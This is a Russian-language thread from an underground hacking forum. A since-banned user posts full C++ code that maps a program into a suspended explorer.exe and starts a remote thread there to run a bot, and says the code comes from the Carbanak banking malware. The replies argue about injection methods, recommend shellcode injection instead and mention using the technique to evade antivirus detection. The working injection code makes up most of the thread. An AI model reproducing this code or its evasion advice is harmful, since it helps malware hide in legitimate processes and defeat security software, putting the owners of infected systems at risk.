• XSS.stack #1 – первый литературный журнал от юзеров форума

Запускаем часть своего кода С++ в другом процессе

Crypto Locker

(L3) cache
Забанен
Реакции
116
Пожалуйста, обратите внимание, что пользователь заблокирован
Код не мой, просто резко появилось желание наплодить индусов. Удачи в копипасте всем, кто
за этим пришёл.
C++:
DWORD WINAPI injectedCode() {
    const char* libList[] = { "shlwapi.dll", "mpr.dll", "netapi32.dll", "Gdiplus.dll", "wininet.dll", "kernel32.dll", "ws2_32.dll", "Gdi32.dll", "Ole32.dll", "Iphlpapi.dll" };
    for(int i = 0; i < _countof(libList); i++){
        LoadLibraryA((char*)libList[i]);
    }
    runBot();
    return 0;
}

void ProcessRelocs(PIMAGE_BASE_RELOCATION reloc, SIZE_T imageBase, SIZE_T delta, DWORD relocSize)
{
    if (relocSize <= 0) return;
    while (reloc->SizeOfBlock > 0)
    {
        SIZE_T va = imageBase + reloc->VirtualAddress;
        unsigned short* relInfo = (unsigned short*)((byte*)reloc + IMAGE_SIZEOF_BASE_RELOCATION);

for (DWORD i = 0; i < (reloc->SizeOfBlock - IMAGE_SIZEOF_BASE_RELOCATION) / 2; i++, relInfo++)
        {
            int type = *relInfo >> 12;
            int offset = *relInfo & 0xfff;

switch (type)
            {
            case IMAGE_REL_BASED_ABSOLUTE:
                break;
            case IMAGE_REL_BASED_HIGHLOW:
            case IMAGE_REL_BASED_DIR64:
                *((SIZE_T*)(va + offset)) += delta;
                break;
            }
        }
        reloc = (PIMAGE_BASE_RELOCATION)(((SIZE_T)reloc) + reloc->SizeOfBlock);
    }
}

HMODULE GetImageBase(void* funcAddr)
{
    SIZE_T addr = (funcAddr) ? (SIZE_T)funcAddr : (SIZE_T)&GetImageBase;
    addr &= ~0xffff;
    for (;;)
    {
        PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)addr;
        if (dosHeader->e_magic == IMAGE_DOS_SIGNATURE)
        {
            if (dosHeader->e_lfanew < 0x1000)
            {
                PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((byte*)addr)[dosHeader->e_lfanew];
                if (header->Signature == IMAGE_NT_SIGNATURE)
                    break;
            }
        }
        addr -= 0x10000;
    }
    return (HMODULE)addr;
}

inline PIMAGE_OPTIONAL_HEADER GetOptionalHeader(HMODULE imageBase)
{
    return (PIMAGE_OPTIONAL_HEADER)((LPVOID)((SIZE_T)imageBase + ((PIMAGE_DOS_HEADER)(imageBase))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)));
}

SIZE_T InjectCode(HANDLE hprocess, typeFuncThread startFunc, HMODULE* newBaseImage)
{
    HMODULE imageBase = GetImageBase(startFunc);
    DWORD sizeOfImage = GetOptionalHeader(imageBase)->SizeOfImage;

HANDLE hmap = CreateFileMappingA((HANDLE)-1, nullptr, PAGE_EXECUTE_READWRITE, 0, sizeOfImage, nullptr);

void* view = MapViewOfFile(hmap, FILE_MAP_WRITE, 0, 0, 0);
    if (!view)    return false;

memcpy(view, (void*)imageBase, sizeOfImage);

SIZE_T viewSize = 0;
    SIZE_T newBaseAddr = 0;
    SIZE_T addr = 0;

NTSTATUS status = ZwMapViewOfSection(hmap, hprocess, (PVOID*)&newBaseAddr, 0, sizeOfImage, nullptr, &viewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE);

if (status == 0)
    {
        PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)imageBase;
        PIMAGE_NT_HEADERS pe = (PIMAGE_NT_HEADERS)((byte*)pdh + pdh->e_lfanew);

ULONG relRVA = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        ULONG relSize = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
        ProcessRelocs((PIMAGE_BASE_RELOCATION)((SIZE_T)imageBase + relRVA), (SIZE_T)view, newBaseAddr - (SIZE_T)imageBase, relSize);

addr = (SIZE_T)startFunc - (SIZE_T)imageBase + newBaseAddr;
    }
    if (newBaseImage) *newBaseImage = (HMODULE)newBaseAddr;
    UnmapViewOfFile(view);
    CloseHandle(hmap);

return addr;
}

BOOL RunInjectCode(HANDLE hProc, HANDLE hthread, typeFuncThread startFunc, typeInjectCode func)
{
    unsigned int addr = func(hProc, startFunc, 0);
    if (addr == 0) return false;
    DWORD id;
    HANDLE hThread2 = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)addr, 0, 0, &id);
    if (hThread2)
    {
        return 1;
    }
    else
    {
        HANDLE hthread;
        CLIENT_ID cid;
        if (RtlCreateUserThread(hProc, nullptr, FALSE, 0, 0, 0, (void*)addr, 0, &hthread, &cid) == 0)
        {
            CloseHandle(hthread);
            return 1;
        }
    }
    return 0;
}

DWORD ExecVA(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, va_list va)
{
    DWORD ret = 0;
    if (exitCode) *exitCode = 0;
    if (hprocess) *hprocess = 0;
    if (hthread) *hthread = 0;

STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFOA));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

si.cb = sizeof(si);

BOOL res = FALSE;
    if (!res)
    {
        res = CreateProcessA(0, (CHAR*)cmd, 0, 0, FALSE, options, 0, 0, &si, &pi);
    }
    if (res)
    {
        if (wait > 0)
        {
            if (WaitForSingleObject(pi.hProcess, wait) == WAIT_OBJECT_0)
            {
                if (exitCode)
                {
                    GetExitCodeProcess(pi.hProcess, exitCode);
                }
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
                pi.hThread = 0;
                pi.hProcess = 0;
                ret = pi.dwProcessId;
            }
        }
        else
            ret = pi.dwProcessId;

if (hthread)
            *hthread = pi.hThread;
        else
            CloseHandle(pi.hThread);

if (hprocess)
            *hprocess = pi.hProcess;
        else
            CloseHandle(pi.hProcess);

}
    return ret;
}

DWORD Exec(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, ...)
{
    va_list va;
    va_start(va, cmd);
    return ExecVA(options, hprocess, hthread, exitCode, wait, cmd, va);
}

BOOL RunExplorer(HANDLE* hprocess, HANDLE* hthread)
{
    return Exec(CREATE_SUSPENDED, hprocess, hthread, 0, 0, "explorer.exe") != 0;
}

int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
    HANDLE hprocess, hthread;
    memset((void*)&hprocess, 0, 2048);    
    memset((void*)&hthread, 0, 2048);
    if (RunExplorer(&hprocess, &hthread))
    {
        RunInjectCode(hprocess, hthread, (typeFuncThread)injectedCode, InjectCode);
    }
    ExitProcess(0);
}

Очередная нубовариация инжекта на тему удалённых потоков. ТС, ты серьёзно считаешь, что это кто-то будет копипастить? :smile12:
P.S Код вообще пиздец.

Удачи в копипасте всем, кто
за этим пришёл.
Код так себе) Но я поставлю лайк.

Последнее редактирование:
Очередная нубовариация инжекта на тему удалённых потоков. ТС, ты серьёзно считаешь, что это кто-то будет копипастить? :smile12:
P.S Код вообще пиздец.
Предложите лучше)

Предложите лучше)
Предлагаю. Модификация памяти уже существующего процесса на лету, приводящая к выполнению шеллкода.

Предлагаю. Модификация памяти уже существующего процесса на лету, приводящая к выполнению шеллкода.
Зачем шел кода? Если мне допустим надо выполнить самоудаление или пропись в автозагрузку мне для этого надо шелл открывать?

Зачем шел кода? Если мне допустим надо выполнить самоудаление или пропись в автозагрузку мне для этого надо шелл открывать? А не просто выполнить часть кода в памяти другова процесса?
Чел, не позорься. Если ты не понимаешь, о чём я говорю, я даже боюсь представить, какой у тебя крипт. Причём самоудаление и автозагрузка тут вообще?

Чел, не позорься. Если ты не понимаешь, о чём я говорю, я даже боюсь представить, какой у тебя крипт. Причём самоудаление и автозагрузка тут вообще?
Потому-что данный метод я в некотых своих софтах применял для обхода динамического детекта ав. И тут я узнаю что оказывыеться способ говно код говно а надо шелл коды выполнять. И не надо примешывать судя крипт все-таки он не имеет отношения к теме нашего разговора.

Потому-что данный метод я в некотых своих софтах применял для обхода динамического детекта ав. И тут я узнаю что оказывыеться способ говно код говно а надо шелл коды выполнять. И не надо примешывать судя крипт все-таки он не имеет отношения к теме нашего разговора.
Слушай, ты из прошлого к нам попал? Ты в 2000 году его использовал? Тогда да, я тебе верю. Ты даже не знаешь, что такое шеллкод. По разговору с тобой видно твой уровень, следовательно качество представляемых тобой услуг тоже видно.

Слушай, ты из прошлого к нам попал? Ты в 2000 году его использовал? Тогда да, я тебе верю. Ты даже не знаешь, что такое шеллкод. По разговору с тобой видно твой уровень, следовательно качество представляемых тобой услуг тоже видно.
Мистер, вы некорректно поставили своё предложение. Способ инжекта который считается говном не существует, существуют только актуальные и не актуальные методы инжекта, по тому предложению которое написали, видно что вы не дальновидный и очень обиженный судьбою человек.
И вы в серьёз думаете что кто-то станет сливать в паблик актуальный метод инжекта? P.S. Этот код из Carbanak, эти парни взломали кучу банков, так
что ещё раз подумайте прежде чем писать в тему такую ересь.

Мистер, вы некорректно поставили своё предложение. Способ инжекта который считается говном не существует, существуют только актуальные и не актуальные методы инжекта, по тому предложению которое написали, видно что вы не дальновидный и очень обиженный судьбою человек.
И вы в серьёз думаете что кто-то станет сливать в паблик актуальный метод инжекта? P.S. Этот код из Carbanak, эти парни взломали кучу банков, так
что ещё раз подумайте прежде чем писать в тему такую ересь.
Ты теперь и на "вы" со мной перешёл, я творю чудеса! По предложению, которое я написал - видно, что твои сообщения неплохо меня развлекают, мне смешно. Если ты не понимаешь моей иронии - мне тебя жаль. Я слил. Выше. Если хватит ума реализовать - молодец. Но его у тебя, видимо, не хватит. Из карбанак? Офигеть! Тебя не смущает то, что этому коду лет 7 как минимум? Не пиши того, в чём не разбираешься, плиз. ПрофессЕонал, блин.

Ты теперь и на "вы" со мной перешёл, я творю чудеса! По предложению, которое я написал - видно, что твои сообщения неплохо меня развлекают, мне смешно. Если ты не понимаешь моей иронии - мне тебя жаль. Я слил. Выше. Если хватит ума реализовать - молодец. Но его у тебя, видимо, не хватит. Из карбанак? Офигеть! Тебя не смущает то, что этому коду лет 7 как минимум? Не пиши того, в чём не разбираешься, плиз. ПрофессЕонал, блин.
И в чём ирония тогда уж? И что ты там слил? Инжект шеллкода в процесс, вау! Какая уникальность! Миллионы твои!

И в чём ирония тогда уж? И что ты там слил? Инжект шеллкода в процесс, вау! Какая уникальность! Миллионы твои!
В моём предложении, блин. Ты меня веселишь. Немного теории, позволяющей запилить годный инжект. Да, инжект шеллкода в процесс, подсказка интересующимся лицам. Или есть варианты получше? Давай уж подискутируем тогда на эту тему, как ты видишь эту ситуацию?

@Umbrella выложи пример "своего" кода, тогда спор дествительно пойдёт в нужное русло. Только не говори что в паблике такое светить не будешь)))

@Umbrella выложи пример "своего" кода, тогда спор дествительно пойдёт в нужное русло. Только не говори что в паблике такое светить не будешь)))
Нет желания выдавать детям подобное, убьют же сразу. Если интересно, могу тебе дать метод под хайд. Метод реально простой, менее 200 строк кода, человек с умом уже даже понял, что пропатчить нужно.) Криптолокер позиционирует себя, как профессионала, мне уж очень интересна его точка зрения. Может быть, потом напишу статью по этой теме, если в этом топике ни к чему интересному не прийдём!

Нет желания выдавать детям подобное, убьют же сразу. Если интересно, могу тебе дать метод под хайд. Метод реально простой, менее 200 строк кода, человек с умом уже даже понял, что пропатчить нужно.) Криптолокер позиционирует себя, как профессионала, мне уж очень интересна его точка зрения. Может быть, потом напишу статью по этой теме, если в этом топике ни к чему интересному не прийдём!
Ну пиши статью, потом поговорим. А то так получается игра в одни ворота.

Ну пиши статью, потом поговорим. А то так получается игра в одни ворота.
Я то напишу. Но по твоему, как должен выглядеть нормальный инжект?

Нет желания выдавать детям подобное, убьют же сразу. Если интересно, могу тебе дать метод под хайд.
Ну я бы тоже посмотрел, если не сложно. От меня в паблик не уйдёт...

Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх